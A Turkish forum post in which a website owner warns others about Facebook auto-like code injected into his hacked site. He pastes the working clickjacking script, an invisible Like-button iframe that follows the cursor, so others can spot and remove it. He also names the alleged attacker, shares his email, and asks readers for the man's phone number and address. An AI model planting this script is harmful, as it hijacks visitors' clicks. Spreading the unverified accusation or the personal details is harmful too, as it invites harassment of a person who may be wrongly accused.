Arkadaşlar 2 defadır nerden girdiğini henüz bulamadığım şereften yoksun o.ç. teki siteme Facebook otolike kodu ekliyor. Facebook sayfasından sayfa sahibine ulaştım o yapmıştır diye. Adam ben parayla facebook sayfa kasma işi almıştım o adam yapmıştır muhtemelen dedi. Sizde sitelerinizi kontrol edin şöyle bir kodla karşılaşırsanız kaldırın.
Hackle siteye otolike kodu yükleyen kişinin mail adresini facebook sayfa sahibi paylaştı şimdi. 50 tl karşılıgında bu işi yapıyormuş.
Mail + Skype:
aspdestek@hotmail.com.tr
Bu adresi tanıyan bilen gören varsa acilen bana ulaşsın rica ediyorum.
Güncelleme: Mail adresini arattığımda Murat Aydın denen bir şerefsize ait oldugunu öğrendim. Herhangi bir iletişim bilgisini bilen varsa paylaşırsa sevinirim. (Tel adres vs.)
<script type="text/javascript">$(document).on('mousemove',function(e){ $('#zorlaguzellik').css("left",e.pageX - 18); $('#zorlaguzellik').css("top",e.pageY - 4); setTimeout(function(){$('#zorlaguzellik').html('');}, 5000);});</script><div id="zorlaguzellik" style="width: 45px;opacity:0;position:fixed;z-index:999;overflow:hidden;"> <iframe src="http://www.facebook.com/plugins/like.php?href=https%3A%2F%2Fwww.facebook.com%2Fcilginkeps&width&layout=button_count&action=like&show_faces=false&share=false&height=21" scrolling="no" frameborder="0" style="border:none; overflow:hidden; height:21px;margin-left: -20px;" allowTransparency="true"></iframe></div>